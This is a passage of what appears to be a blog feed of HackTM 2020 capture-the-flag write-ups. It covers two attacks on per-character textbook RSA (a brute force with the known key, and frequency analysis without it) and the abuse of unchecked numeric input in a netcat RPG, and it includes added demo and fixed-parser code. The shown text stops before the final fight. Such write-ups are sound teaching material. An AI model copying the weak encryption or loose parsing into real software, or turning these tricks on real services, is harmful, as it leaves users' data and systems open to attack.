16657126895659048065404729920028465477385009450133540950695155983380795627778054526133891673615252510518969355629562948102050307259107355106086468465392660721567070464708776158039303608428552547481825035736610837329720474688421062759594907620576318249542577396722737724172954532394471909440668625218820801756, 11113777356910731413424023299582648618258376222028450254478672148119889617557563576704932635131420845868165014982665717620845578039880527701593963719893467068820107811384041511295664833904504511210342105242330522375476482706044695838957591685781703894244561607764476555630573446589408768780659378128082633769, 20895198446192697825002890636650624361863759520944494391240191454443921345578043873584884838772334163748883476104011030592329948454531053024873263786017045083052443924403769542324123323834338391361149767913830998218951574784777785739566046139742309557536025214334831372509789246522325522982945241815388133477, 1681724029430984846089508679185107538104072555994133932050319175633667369916570440070548756805254789524599169177371471218251246349461689959989338169394649813424706418737543924129213419625988100326558802566046751879531469160120914735332858786199496335523515150741728027296830843112416558460932541777024522279, 5237767970074646857079948735567615361735616179074197239639640947679550920349684166643572837235712904929824521258264241503059989875517915784117038966236672390569320206379357882906463342282254405974383459878863044723383164329146669331810709270455492110346838097216174137176255793792848357953314563364460847842, 20895198446192697825002890636650624361863759520944494391240191454443921345578043873584884838772334163748883476104011030592329948454531053024873263786017045083052443924403769542324123323834338391361149767913830998218951574784777785739566046139742309557536025214334831372509789246522325522982945241815388133477, 
2141625583250052666579569568613448089970148215959031795439930595139028085767825695294403905882459409861220995951141855281841435481587946825079031782977651718402048988278639212978854590412709087674713750292922397103941195760574072700517109381299788645871729355745594573785064162048047595009933642068871994670, 278354276293884030290100330445865286604723740111170856624965259573282278044823323212960304154629174664076141280100412502135750130875356944835909175355370317285768658282746817782130476757714384697086179400629156643250500432197002583758692394681401772203578628635926749457621478296182304772136118691761841359, 6039667595601233082552071610487048398346324705021423176423484623705376133358539134558362499891954091431687578305623106726900655384011241742715735786166290331136153240702822544221903404870992713778423167867663948083662620087859096707381620051266745156545213726214080049764382107442159825610310695543673475542, 21353765873487781085375016306418205544750755310255410963646737671193146222650262290683259548572190880304009015662963424520575937651278866672082973874806201031606257157229306007587966460187818647603633973019548401357989358306250139692325474674826791149726161678649996852062656272851387461089863388359261125336, 11226318059664066669163529308725576208632153806776762372429671026861927737060205604020741904348343722215670471225630839065129589767356765848271000166982882271636977663052775953958080543340165408211633442938366994031562890034541604362383645601883118173819506187865617998294930587997187071040181458961091560176, 20576388598886140095325204584799302384454378372204683348252463729525849583734948105765087991438423260690623246579570440405616572326057536248148020737810766134083795050076636686776809469271643188562482921546497071402873405706504773345621716428511481598704631451463399778602486417840466985891815649711178813963, 
17347447662661486040040289855519394974371562320877472776529836975445205017304164550202099250096382852783253959549113036367974281750823938616836362593312254792770954856762797438690474329666549947795964992533463700161635382925555835347885819042031312006167190561233042383984087765920275010577545908085026177611, 11788628214684738246695632901992250075758959059858474645166125685861157046466064692980236734739634298802473894878268029860203026238925142258303727438570051822763330338744774300757888262747314093511013562545738571326771345495509434761853742569509480619380000424215527153118231084573851377049921456961916278761, 20895198446192697825002890636650624361863759520944494391240191454443921345578043873584884838772334163748883476104011030592329948454531053024873263786017045083052443924403769542324123323834338391361149767913830998218951574784777785739566046139742309557536025214334831372509789246522325522982945241815388133477, 2141625583250052666579569568613448089970148215959031795439930595139028085767825695294403905882459409861220995951141855281841435481587946825079031782977651718402048988278639212978854590412709087674713750292922397103941195760574072700517109381299788645871729355745594573785064162048047595009933642068871994670, 2710029303357232932696197225263692040597986927359269224740812600224998707144266259851604978553286889767425982708691908438984279442981540971935737617354609856642312100797081348174935195638083002333058089328102430432526612805955273581245352312630845237670744276402867230550537275379675828467791243032108754996, 19981107233593350929447953514006501458466479260151660185153999799085657467921097940751860717309377498501638075002136637344148955811617399850718322497572421311807629329642551519284713638882025500074565475569618691516951449764680555447185364165687596161053684299589053909233984617244886185728811651967713024530, 
3975884358027162862622932959187611984655247354547659825042810425039322096401899672988989768997134724085482147901304365437476311647149733392577446833370358728610677436154877051592307539990184750467273668379065865808900410057533079113476991204462719784464847498582643056503810805516315622314948257403761762299, 6039667595601233082552071610487048398346324705021423176423484623705376133358539134558362499891954091431687578305623106726900655384011241742715735786166290331136153240702822544221903404870992713778423167867663948083662620087859096707381620051266745156545213726214080049764382107442159825610310695543673475542, 14296542628093736444815382636071360035549021313467366701986569710120268508807886041986007828960248665683292143486565404978073122476968882030310174125355932205646388813061197657253533595700948593692407928813318978600474254105007396254987998953819782624738628334271910759242195864082910860797444993756044746481, 20895198446192697825002890636650624361863759520944494391240191454443921345578043873584884838772334163748883476104011030592329948454531053024873263786017045083052443924403769542324123323834338391361149767913830998218951574784777785739566046139742309557536025214334831372509789246522325522982945241815388133477, 7983594351048693624291138893287137601848867970873700373034058935656045095987011116108642350616654713531373295621458596238107660073931212524833777531450461876588350132328332972361857441613098452082271331281504722310376573085001395356078670960667878342134517577992585442881605030717788248137764480486762452442, 7983594351048693624291138893287137601848867970873700373034058935656045095987011116108642350616654713531373295621458596238107660073931212524833777531450461876588350132328332972361857441613098452082271331281504722310376573085001395356078670960667878342134517577992585442881605030717788248137764480486762452442, 
23267174349531278768420819619439317179083929128083924515569762521057285892931325108327037262091624670335579302436476096123152288550738706103166820604983405317430467198343871458522070337902643863890959573514405066297449924638838605501211486861582957963752388608487593217237563529201436917108304692859773404548]
</code></pre></div>
<p>So, since we know all the numbers needed to perform the encryption, we can brute-force each character of the flag: encrypt every printable candidate and compare the result with the target value:</p>
<div class="highlight"><pre><span></span><code><span class="c1"># ciphertext values from the c file, one RSA value per flag character</span>
<span class="n">decode</span> <span class="o">=</span> <span class="p">[</span><span class="mi">2460393140</span> <span class="p">[</span><span class="o">...</span><span class="p">]</span> <span class="mi">9773404548</span><span class="p">]</span>
<span class="n">e</span> <span class="o">=</span> <span class="mi">65537</span>
<span class="n">n</span> <span class="o">=</span> <span class="mi">28150970547901913019901824364390497053600856369839321617996700606130553862041378369018779003752433356889118526332329074054728613209407037089320809898343953157935211086135010436283805891893636870991411236307901650696221491790470635225076251966300189483160148297407974155121570252648252906976186499329924342873</span>
<span class="c1"># every printable character is a candidate plaintext</span>
<span class="n">char_test</span> <span class="o">=</span> <span class="s2">"0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!</span><span class="se">\"</span><span class="s2">#$%&</span><span class="se">\'</span><span class="s2">()*+,-./:;<=>?@[</span><span class="se">\\</span><span class="s2">]^_`{|}~"</span>
<span class="n">flag</span> <span class="o">=</span> <span class="s2">""</span>
<span class="k">for</span> <span class="n">char</span> <span class="ow">in</span> <span class="n">decode</span><span class="p">:</span>
    <span class="k">for</span> <span class="n">clear</span> <span class="ow">in</span> <span class="n">char_test</span><span class="p">:</span>
        <span class="c1"># textbook RSA: c = m^e mod n, so re-encrypt the candidate and compare</span>
        <span class="n">cipher</span> <span class="o">=</span> <span class="nb">pow</span><span class="p">(</span><span class="nb">ord</span><span class="p">(</span><span class="n">clear</span><span class="p">),</span> <span class="n">e</span><span class="p">,</span> <span class="n">n</span><span class="p">)</span>
        <span class="k">if</span> <span class="n">cipher</span> <span class="o">==</span> <span class="n">char</span><span class="p">:</span>
            <span class="n">flag</span> <span class="o">+=</span> <span class="n">clear</span>
            <span class="k">break</span>
<span class="nb">print</span><span class="p">(</span><span class="n">flag</span><span class="p">)</span>
</code></pre></div>
<p>Running the script gives the flag:</p>
<div class="highlight"><pre><span></span><code>$ python decode.py
HackTM<span class="o">{</span>why_ar3_MY_pR1va7es_pu8l1C_??<span class="o">}</span>
</code></pre></div>
<p>Since the operations are simple and the flag is short, the run was fast: <code>python decode.py 0,18s user 0,02s system 99% cpu 0,199 total</code>.</p>
HackTM Quals20 - RSA is easy #2 2020-02-05T00:00:00+01:00 2020-02-05T00:00:00+01:00 nlegall tag:blog.nlegall.fr,2020-02-05:/hacktm-quals20-rsa-is-easy-2.html
<p><em>solves : 157</em></p>
<div class="highlight"><pre><span></span><code>RSA is easy #2
50 Points
Provide the flag in this format:
HackTM{words_you_found}
Example:
If you find "i am a flag"
submit:
HackTM{i_am_a_flag}
Author: stackola
challenge_files_2.zip bebe0b93b184fd375c3462488c9fde01
</code></pre></div>
<p>Same as <a href="/hacktm-quals20-rsa-is-easy-1.html">RSA is easy #1</a>, we have exactly the same python script but with a new <a href="https://blog.nlegall.fr/files/hacktm/rsa2/c">c</a> file.</p>
<p>This time, we don't have the public key information:</p>
<div class="highlight"><pre><span></span><code>Public key:
[DATA CORRUPTED]
</code></pre></div>
<p>We can't use the same brute-force approach without the public key. But we have a lot of ciphertext, and since the script encrypts each character separately with no padding, equal characters always give equal numbers: the ciphertext is just a monoalphabetic substitution of the plaintext. We can replace each distinct number with a letter and do a frequency analysis.</p>
<p>Let's put all the values in a file, one per line, and check how many different numbers we have:</p>
<div class="highlight"><pre><span></span><code>$ tail -n <span class="m">1</span> c <span class="p">|</span> sed -E <span class="s1">'s/\[(.*)\]/\1/g'</span> <span class="p">|</span> sed <span class="s1">'s/, /\n/g'</span> <span class="p">|</span> wc -l
<span class="m">1111</span>
$ tail -n <span class="m">1</span> c <span class="p">|</span> sed -E <span class="s1">'s/\[(.*)\]/\1/g'</span> <span class="p">|</span> sed <span class="s1">'s/, /\n/g'</span> <span class="p">|</span> sort -n <span class="p">|</span> uniq <span class="p">|</span>wc -l
<span class="m">31</span>
</code></pre></div>
<p>So we have 1111 values but only 31 distinct ones. We now need to replace each value with a symbol, which a bit of Python can do:</p>
<div class="highlight"><pre><span></span><code><span class="kn">import</span> <span class="nn">ast</span>

<span class="c1"># the last line of the c file is the Python list of ciphertext values</span>
<span class="k">with</span> <span class="nb">open</span><span class="p">(</span><span class="s2">"c"</span><span class="p">)</span> <span class="k">as</span> <span class="n">f</span><span class="p">:</span>
    <span class="n">cipher</span> <span class="o">=</span> <span class="n">ast</span><span class="o">.</span><span class="n">literal_eval</span><span class="p">(</span><span class="n">f</span><span class="o">.</span><span class="n">readlines</span><span class="p">()[</span><span class="o">-</span><span class="mi">1</span><span class="p">])</span>

<span class="c1"># give each distinct value a symbol, starting at "a", in order of first appearance</span>
<span class="n">mapping</span> <span class="o">=</span> <span class="p">{}</span>
<span class="n">cur</span> <span class="o">=</span> <span class="s2">"a"</span>
<span class="k">for</span> <span class="n">x</span> <span class="ow">in</span> <span class="n">cipher</span><span class="p">:</span>
    <span class="k">if</span> <span class="n">x</span> <span class="ow">not</span> <span class="ow">in</span> <span class="n">mapping</span><span class="p">:</span>
        <span class="n">mapping</span><span class="p">[</span><span class="n">x</span><span class="p">]</span> <span class="o">=</span> <span class="n">cur</span>
        <span class="n">cur</span> <span class="o">=</span> <span class="nb">chr</span><span class="p">(</span><span class="nb">ord</span><span class="p">(</span><span class="n">cur</span><span class="p">)</span><span class="o">+</span><span class="mi">1</span><span class="p">)</span>

<span class="c1"># rewrite the ciphertext with the symbols and count how often each one occurs</span>
<span class="n">mapped</span> <span class="o">=</span> <span class="p">[]</span>
<span class="n">freqs</span> <span class="o">=</span> <span class="p">{}</span>
<span class="k">for</span> <span class="n">x</span> <span class="ow">in</span> <span class="n">cipher</span><span class="p">:</span>
    <span class="n">mapped</span><span class="o">.</span><span class="n">append</span><span class="p">(</span><span class="n">mapping</span><span class="p">[</span><span class="n">x</span><span class="p">])</span>
    <span class="k">if</span> <span class="n">mapping</span><span class="p">[</span><span class="n">x</span><span class="p">]</span> <span class="ow">not</span> <span class="ow">in</span> <span class="n">freqs</span><span class="p">:</span>
        <span class="n">freqs</span><span class="p">[</span><span class="n">mapping</span><span class="p">[</span><span class="n">x</span><span class="p">]]</span> <span class="o">=</span> <span class="mi">1</span>
    <span class="k">else</span><span class="p">:</span>
        <span class="n">freqs</span><span class="p">[</span><span class="n">mapping</span><span class="p">[</span><span class="n">x</span><span class="p">]]</span> <span class="o">+=</span> <span class="mi">1</span>

<span class="c1"># the most frequent symbol is almost certainly the space, so print it as one</span>
<span class="n">freqs_sorted</span> <span class="o">=</span> <span class="p">{</span><span class="n">k</span><span class="p">:</span> <span class="n">v</span> <span class="k">for</span> <span class="n">k</span><span class="p">,</span> <span class="n">v</span> <span class="ow">in</span> <span class="nb">sorted</span><span class="p">(</span><span class="n">freqs</span><span class="o">.</span><span class="n">items</span><span class="p">(),</span> <span class="n">key</span><span class="o">=</span><span class="k">lambda</span> <span class="n">item</span><span class="p">:</span> <span class="n">item</span><span class="p">[</span><span class="mi">1</span><span class="p">],</span> <span class="n">reverse</span><span class="o">=</span><span class="kc">True</span><span class="p">)}</span>
<span class="nb">print</span><span class="p">(</span><span class="s1">''</span><span class="o">.</span><span class="n">join</span><span class="p">(</span><span class="n">mapped</span><span class="p">)</span><span class="o">.</span><span class="n">replace</span><span class="p">(</span><span class="nb">list</span><span class="p">(</span><span class="n">freqs_sorted</span><span class="o">.</span><span class="n">keys</span><span class="p">())[</span><span class="mi">0</span><span class="p">],</span> <span class="s2">" "</span><span class="p">))</span>
</code></pre></div>
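<p>As an added example (my own code, not the blog's script), the following Python puts the two RSA is easy write-ups side by side on a toy key: the brute force that works when (e, n) is known, and the substitution view that works when it isn't, because per-character textbook RSA with no padding maps equal characters to equal numbers. The key (n = 3233, e = 17) and the sample sentence are constructed for the demo, and the symbol alphabet continues into upper case instead of running past "z" into punctuation.</p>

```python
"""Added example, not the blog's own script: why encrypting one character at a
time with textbook RSA is only a substitution cipher, and the two attacks the
RSA is easy write-ups use, with the public key (#1) and without it (#2)."""
import string
from collections import Counter

# Toy textbook-RSA key, constructed for the demo and far too small for real use:
# p = 61, q = 53, n = 3233, phi = 3120, e = 17 (d = 2753 is never needed here).
E, N = 17, 3233
PRINTABLE = string.digits + string.ascii_letters + string.punctuation + " "
SYMBOLS = string.ascii_lowercase + string.ascii_uppercase  # 52 substitution symbols
DEMO_MESSAGE = "never roll your own crypto never roll your own carpet"  # constructed


def encrypt_per_char(message, e=E, n=N):
    """Encrypt each character on its own, as the challenge script does.
    There is no padding and no randomness, so equal characters always give
    equal numbers: the whole ciphertext leaks the plaintext's structure."""
    return [pow(ord(ch), e, n) for ch in message]


def brute_force_known_key(cipher, e=E, n=N, alphabet=PRINTABLE):
    """RSA is easy #1: with (e, n) known, encrypt every printable character
    once and look each ciphertext value up in that table (RSA is a bijection
    on Z_n, so two different characters can never share a value)."""
    table = {pow(ord(ch), e, n): ch for ch in alphabet}
    return "".join(table.get(value, "?") for value in cipher)


def substitution_view(cipher, symbols=SYMBOLS):
    """RSA is easy #2: with the key unknown, rename each distinct value to a
    symbol in order of first appearance and count symbol frequencies.
    Returns (mapped_text, [(symbol, count), ...] most frequent first)."""
    mapping = {}
    for value in cipher:
        if value not in mapping:
            if len(mapping) == len(symbols):
                raise ValueError("more distinct values than symbols")
            mapping[value] = symbols[len(mapping)]
    mapped = "".join(mapping[value] for value in cipher)
    return mapped, Counter(mapped).most_common()


def guess_spaces(mapped, freqs):
    """In English prose the most frequent symbol is the space; exposing it
    gives the word boundaries a solver like quipqiup works from."""
    return mapped.replace(freqs[0][0], " ")


if __name__ == "__main__":
    cipher = encrypt_per_char(DEMO_MESSAGE)
    print("with key:   ", brute_force_known_key(cipher))
    mapped, freqs = substitution_view(cipher)
    print("without key:", guess_spaces(mapped, freqs))
```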
<p>Running it on the challenge's c file gives the mapped text:</p>
<div class="highlight"><pre><span></span><code>abcd f agh fd ijkkclc fd mbc cgnko pqhr f sctfhcs abgm f uckfctcs agh g unfkkfgdm cdinovmfjd hibcwcx g hfwvkc vhcysjngdsjw dywucn hmncgw agh gsscs mj mbc vkgfdmczm hmncgw mj incgmc ifvbcnmczmx mbfh ajyks hccwfdlko mbagnm gdo {nc|ycdio gdgkohfh j{ mbc ifvbcnmczmr gds ajyks uc ydingi}gukc ctcd mj mbc wjhm nchjynic{yk ljtcndwcdm fdmckkflcdic glcdifchx f {ckm hj hwyl gujym wo gibfctcwcdmx ocgnh kgmcnr f sfhijtcncs mbfh hgwc hibcwc fd hctcngk fdmnjsyimjno inovmjlngvbo mczmh gds mymjnfgk vgvcnhx bja dficx jmbcn inovmjlngvbcnh bgs mbjylbm j{ mbc hgwc hibcwcx yd{jnmydgmckor mbc hibcwc agh vnchcdmcs gh g hfwvkc bjwcajn} ghhfldwcdm jd bja mj yhc ckcwcdmgno inovmgdgkomfi mcibdf|ych mj mnftfgkko ingi} fmx hj wyib {jn wo unfkkfgdm hibcwcx {njw mbfh bywukfdl czvcnfcdic f kcgndcs bja cgho fm fh mj {gkk fdmj g {gkhc hcdhc j{ hciynfmo abcd sctfhfdl gd cdinovmfjd gkljnfmbwx wjhm vcjvkc sjd~m ncgkfc bja {fcdsfhbko sf{{fiykm fm fh mj sctfhc gd cdinovmfjd gkljnfmbw mbgm igd afmbhmgds g vnjkjdlcs gds scmcnwfdcs gmmgi} uo g nchjynic{yk jvvjdcdmx bcnc fh mbc {kglx abcd fm ijwch mj inovmj jn ignvcm dctcn njkk ojyn jad
</code></pre></div>
<p>I used the website <a href="https://quipqiup.com/">quipqiup</a> to reverse the substitution and get the original text back:</p>
<div class="highlight"><pre><span></span><code>when i was in college in the early fjsk i devised what i believed was a brilliant encryption schemez a simple pseudorandom number stream was added to the plaintext stream to create ciphertextz this would seemingly thwart any {re|uency analysis o{ the ciphertextk and would be uncrac}able even to the most resource{ul government intelligence agenciesz i {elt so smug about my achievementz years laterk i discovered this same scheme in several introductory cryptography texts and tutorial papersz how nicez other cryptographers had thought o{ the same schemez un{ortunatelyk the scheme was presented as a simple homewor} assignment on how to use elementary cryptanalytic techni|ues to trivially crac} itz so much {or my brilliant schemez {rom this humbling experience i learned how easy it is to {all into a {alse sense o{ security when devising an encryption algorithmz most people don~t realie how {iendishly di{{icult it is to devise an encryption algorithm that can withstand a prolonged and determined attac} by a resource{ul opponentz here is the {lagz when it comes to crypto or carpet never roll your own
</code></pre></div>
<p>Since the 31 distinct numbers needed more symbols than the 26 letters, some of them were replaced by special characters that were left untouched. The text is still readable and gives the flag: <code>HackTM{when_it_comes_to_crypto_or_carpet_never_roll_your_own}</code>.</p>
HackTM Quals20 - The dragon sleeps at night 2020-02-05T00:00:00+01:00 2020-02-05T00:00:00+01:00 nlegall tag:blog.nlegall.fr,2020-02-05:/hacktm-quals20-the-dragon-sleeps-at-night.html
<p><em>solves : 332</em></p>
<div class="highlight"><pre><span></span><code>The dragon sleeps at night
50 Points
I made this console based dragon RPG.
Go kill the beast!
nc 138.68.67.161 60004
Author: stackola
</code></pre></div>
<p>We have a role-playing game and need to slay the dragon to discover the flag.</p>
<div class="highlight"><pre><span></span><code>$ nc 138.68.67.161 60004
Welcome to our little town!
We're glad you've decided to help us fight the dragon and bring back this town to it's old glory.
We have a shop where you can buy many different weapons for your fight!
There's also a mine for you to work at. The boss is a very trusting guy, don't try to scam him please.
-------------------------------
-------------------------------
Day: 0
Time: 00:00
Your balance: $0
-------------------------------
1: Go to store
2: Go to work
3: Go to dragons cave
4: Go home
5: Storage
</code></pre></div>
<p>Let's visit the cave first to say hello:</p>
<div class="highlight"><pre><span></span><code>> 3
You can not enter this cave without a sword
</code></pre></div>
<p>Ok, then go to work:</p>
<div class="highlight"><pre><span></span><code>> 2
-------------------------------
Going to work...
Time passes...
Slowly...
-------------------------------
Boss wants to know how many hours you worked: > 99999
Only 3 characters allowed
-------------------------------
</code></pre></div>
<p>We can't use a string longer than 3 chars. Let's try a negative number:</p>
<div class="highlight"><pre><span></span><code>> <span class="mi">2</span>
-------------------------------
<span class="n">Going</span> <span class="nb">to</span> <span class="n">work</span>...
<span class="n">Time</span> <span class="n">passes</span>...
<span class="n">Slowly</span>...
<span class="mf">9e9</span>
-------------------------------
<span class="n">Boss</span> <span class="n">wants</span> <span class="nb">to</span> <span class="n">know</span> <span class="nb">how</span> <span class="n">many</span> <span class="n">hours</span> <span class="n">you</span> <span class="n">worked:</span> > -<span class="mi">1</span>
-<span class="mf">1.0</span> <span class="n">hours</span> <span class="nb">at</span> <span class="nv">$1</span><span class="o">/</span><span class="nb">hour</span>? <span class="n">That's</span> <span class="nv">$-1</span><span class="mf">.0</span>.
<span class="nv">$-1</span><span class="mf">.0</span> <span class="n">received</span>.
-------------------------------
<span class="n">Day:</span> <span class="mi">0</span>
<span class="n">Time:</span> <span class="mo">06</span>:<span class="mo">00</span>
<span class="n">Your</span> <span class="n">balance:</span> <span class="nv">$-1</span><span class="mf">.0</span>
-------------------------------
</code></pre></div>
<p>Perfect! We lose one dollar by working, so the input is parsed as a number with no sign check. Let's restart and enter something that fits in 3 chars but is a big number: <code>9e9</code> or <code>inf</code>.</p>
<div class="highlight"><pre><span></span><code>-------------------------------
<span class="n">Going</span> <span class="nb">to</span> <span class="n">work</span>...
<span class="n">Time</span> <span class="n">passes</span>...
<span class="n">Slowly</span>...
<span class="mf">9e9</span>
-------------------------------
<span class="n">Boss</span> <span class="n">wants</span> <span class="nb">to</span> <span class="n">know</span> <span class="nb">how</span> <span class="n">many</span> <span class="n">hours</span> <span class="n">you</span> <span class="n">worked:</span> > <span class="mf">9e9</span>
<span class="mf">9000000000.0</span> <span class="n">hours</span> <span class="nb">at</span> <span class="nv">$1</span><span class="o">/</span><span class="nb">hour</span>? <span class="n">That's</span> <span class="nv">$9000000000</span><span class="mf">.0</span>.
<span class="nv">$9000000000</span><span class="mf">.0</span> <span class="n">received</span>.
-------------------------------
<span class="n">Day:</span> <span class="mi">0</span>
<span class="n">Time:</span> <span class="mo">06</span>:<span class="mo">00</span>
<span class="n">Your</span> <span class="n">balance:</span> <span class="nv">$9000000000</span><span class="mf">.0</span>
-------------------------------
<span class="mi">1</span>: <span class="n">Go</span> <span class="nb">to</span> <span class="n">store</span>
<span class="mi">2</span>: <span class="n">Go</span> <span class="nb">to</span> <span class="n">work</span>
<span class="mi">3</span>: <span class="n">Go</span> <span class="nb">to</span> <span class="n">dragons</span> <span class="n">cave</span>
<span class="mi">4</span>: <span class="n">Go</span> <span class="n">home</span>
<span class="mi">5</span>: <span class="n">Storage</span>
</code></pre></div>
<p>Nice, we now have plenty of money. We need a sword to enter the dragon's cave.</p>
<div class="highlight"><pre><span></span><code>> 1
-------------------------------
Welcome to the store:
-------------------------------
Level 1 Sword: 10 Damage
Price: $10
-------------------------------
Level 2 Sword: 100 Damage
Price: $100
-------------------------------
Level 3 Sword: 1,000 Damage
Price: $1,000
-------------------------------
Level 4 Sword: 10,000 Damage
Price: $1,000,000
-------------------------------
Level 5 Sword: 100,000 Damage
Price: $1,000,000,000
-------------------------------
What do you want? (1-5 or e for exit) > 5
Received Sword level 5.
-------------------------------
</code></pre></div>
<p>Ready to fight and get the flag!</p>
<div class="highlight"><pre><span></span><code><span class="n">Day:</span> <span class="mi">0</span>
<span class="n">Time:</span> <span class="mi">12</span>:<span class="mo">00</span>
<span class="n">Your</span> <span class="n">balance:</span> <span class="nv">$8000000000</span><span class="mf">.0</span>
<span class="n">Your</span> <span class="n">sword:</span> <span class="mi">5</span>
-------------------------------
<span class="mi">1</span>: <span class="n">Go</span> <span class="nb">to</span> <span class="n">store</span>
<span class="mi">2</span>: <span class="n">Go</span> <span class="nb">to</span> <span class="n">work</span>
<span class="mi">3</span>: <span class="n">Go</span> <span class="nb">to</span> <span class="n">dragons</span> <span class="n">cave</span>
<span class="mi">4</span>: <span class="n">Go</span> <span class="n">home</span>
<span class="mi">5</span>: <span class="n">Storage</span>
> <span class="mi">3</span>
-------------------------------
<span class="n">Welcome</span> <span class="nb">to</span> <span class="n">the</span> <span class="n">dragon's</span> <span class="n">cave</span>
-------------------------------
<span class="n">The</span> <span class="n">dragon</span> <span class="k">is</span> <span class="n">awake</span>.
<span class="n">He</span> <span class="n">sees</span> <span class="n">you</span> <span class="nb">first</span> <span class="o">and</span> <span class="n">instantly</span> <span class="n">kills</span> <span class="n">you</span> <span class="k">with</span> <span class="n">a</span> <span class="n">large</span> <span class="n">fireball</span>.
<span class="n">Game</span> <span class="n">over</span>
</code></pre></div>
<p>All of this to get instantly turned into a big meatball :'(. OK, the title is <code>The dragon sleeps at night</code>, so that's a hint: we can only go to the cave when it's night in the game (18:00).</p>
<p>Let's do the same, but with an extra trip to the shop and back to advance the clock:</p>
<div class="highlight"><pre><span></span><code>[...]
-------------------------------
Welcome to the dragon's cave
-------------------------------
You see the dragon sleeping next to a pile of bodies.
They look disturbingly fresh.
Carrying your glorious level 5 sword, you slowly walk over.
Carefully, you position the mighty weapon exactly over his skull.
BOOM! Perfect hit!
The dragon wakes up! He's not dead?
I was told level 5 would be enough!
'if only there was a level 6 sword' are your last thoughts...
...as the dragon obliterates you with a hurricane of fire.
Game over
</code></pre></div>
<p>Nooooo. We need a higher sword level to beat this dragon.</p>
<p>So, let's take a look at the storage.</p>
<div class="highlight"><pre><span></span><code><span class="err">> 5</span>
<span class="err">-------------------------------</span>
<span class="err">Storage for up to (1) sword.</span>
<span class="err">Please note: Swords degrade by 1 level for each day they are left in storage.</span>
<span class="err">-------------------------------</span>
</code></pre></div>
<p>Hmm, for each day in storage the sword loses a level. But maybe, as with the worked hours, we can deposit the sword and rest for a negative number of days. Let's try this!</p>
<div class="highlight"><pre><span></span><code>Storage is empty.
Do you want to deposit your sword? (y/n) > y
Deposited sword level 5
-------------------------------
Day: 0
Time: 18:00
Your balance: $8000000000.0
-------------------------------
1: Go to store
2: Go to work
3: Go to dragons cave
4: Go home
5: Storage
> 4
Your home.
Here you can take a rest.
How many days do you want to rest for? > -1
Sleeping for -1 days
A sword in storage has degraded from 5 to 6.
You woke up well rested.
</code></pre></div>
<p>It worked! Let's take the sword back and fight the dragon one last time!</p>
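<p>Before the final run, the bug itself as an added example (my own Python, not the challenge's unpublished source): a small model of the game's pay and storage rules with the loose parser reconstructed from what the server printed, beside a strict one that closes the hole. The 24-hour and 30-day bounds are assumptions for the demo.</p>

```python
"""Added example, not the challenge's source (which was not published): a small
model of the game's pay and storage rules, the loose input parsing the
write-up abuses, and a strict parser that closes the hole."""
import re


def parse_hours_loose(text):
    """Reconstructed from the observed behaviour: the server only checks the
    length (3 characters) and then converts with float(), so "-1", "9e9",
    "inf" and "nan" all get through."""
    if len(text) > 3:
        raise ValueError("Only 3 characters allowed")
    return float(text)


def parse_count_strict(text, lo, hi):
    """Defensive version: an ASCII decimal integer inside [lo, hi], nothing
    else. The regex rejects signs, dots, exponents and words such as "inf"
    before any conversion, and the range check bounds the value itself;
    a length limit on its own says nothing about the value."""
    if not re.fullmatch(r"[0-9]{1,3}", text):
        raise ValueError("digits only")
    value = int(text)
    if not lo <= value <= hi:
        raise ValueError(f"value must be between {lo} and {hi}")
    return value


def pay_for_work(balance, hours_text, rate=1, strict=False):
    """New balance after a shift at $rate/hour (assumed limit: 24 hours)."""
    hours = parse_count_strict(hours_text, 0, 24) if strict else parse_hours_loose(hours_text)
    return balance + hours * rate


def rest(sword_level, days_text, strict=False):
    """Storage rule from the game: a stored sword loses one level per day.
    With the loose parser a negative day count raises the level instead."""
    days = parse_count_strict(days_text, 1, 30) if strict else parse_hours_loose(days_text)
    return sword_level - days


def accepted_inputs(parser, candidates):
    """Which of the candidate strings a parser lets through."""
    accepted = []
    for text in candidates:
        try:
            parser(text)
            accepted.append(text)
        except ValueError:
            continue
    return accepted


if __name__ == "__main__":
    candidates = ["8", "-1", "9e9", "inf", "nan", "999", "9999"]  # constructed
    print("loose: ", accepted_inputs(parse_hours_loose, candidates))
    print("strict:", accepted_inputs(lambda t: parse_count_strict(t, 0, 24), candidates))
```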
<div class="highlight"><pre><span></span><code>-------------------------------
<span class="n">Day:</span> -<span class="mi">1</span>
<span class="n">Time:</span> <span class="mi">12</span>:<span class="mo">00</span>
<span class="n">Your</span> <span class="n">balance:</span> <span class="nv">$8000000000</span><span class="mf">.0</span>
-------------------------------
<span class="mi">1</span>: <span class="n">Go</span> <span class="nb">to</span> <span class="n">store</span>
<span class="mi">2</span>: <span class="n">Go</span> <span class="nb">to</span> <span class="n">work</span>
<span class="mi">3</span>: <span class="n">Go</span> <span class="nb">to</span> <span class="n">dragons</span> <span class="n">cave</span>
<span class="mi">4</span>: <span class="n">Go</span> <span class="n">home</span>
<span class="mi">5</span>: <span class="n">Storage</span>
> <span class="mi">5</span>
-------------------------------
<span class="n">Storage</span> <span class="k">for</span> <span class="n">up</span> <span class="nb">to</span> (<span class="mi">1</span>) <span class="n">sword</span>.
<span class="n">Please</span> <span class="n">note:</span> <span class="n">Swords</span> <span class="n">degrade</span> <span class="n">by</span> <span class="mi">1</span> <span class="nb">level</span> <span class="k">for</span> <span class="n">each</span> <span class="nb">day</span> <span class="n">they</span> <span class="n">are</span> <span class="n">left</span> <span class="nb">in</span> <span class="n">storage</span>.
-------------------------------
<span class="n">Storage</span> <span class="nb">contains</span> <span class="n">a</span> <span class="n">sword</span> <span class="nb">level</span> <span class="mi">6</span>
<span class="n">Do</span> <span class="n">you</span> <span class="n">want</span> <span class="nb">to</span> <span class="nb">take</span> <span class="n">the</span> <span class="n">sword</span> <span class="n">out</span>? (<span class="n">y</span><span class="o">/</span><span class="n">n</span>) > <span class="n">y</span>
<span class="n">Receiving</span> <span class="nb">level</span> <span class="mi">6</span> <span class="n">sword</span>.
-------------------------------
<span class="n">Day:</span> -<span class="mi">1</span>
<span class="n">Time:</span> <span class="mi">18</span>:<span class="mo">00</span>
<span class="n">Your</span> <span class="n">balance:</span> <span class="nv">$8000000000</span><span class="mf">.0</span>
<span class="n">Your</span> <span class="n">sword:</span> <span class="mi">6</span>
-------------------------------
<span class="mi">1</span>: <span class="n">Go</span> <span class="nb">to</span> <span class="n">store</span>
<span class="mi">2</span>: <span class="n">Go</span> <span class="nb">to</span> <span class="n">work</span>
<span class="mi">3</span>: <span class="n">Go</span> <span class="nb">to</span> <span class="n">dragons</span> <span class="n">cave</span>
<span class="mi">4</span>: <span class="n">Go</span> <span class="n">home</span>
<span class="mi">5</span>: <span class="n">Storage</span>
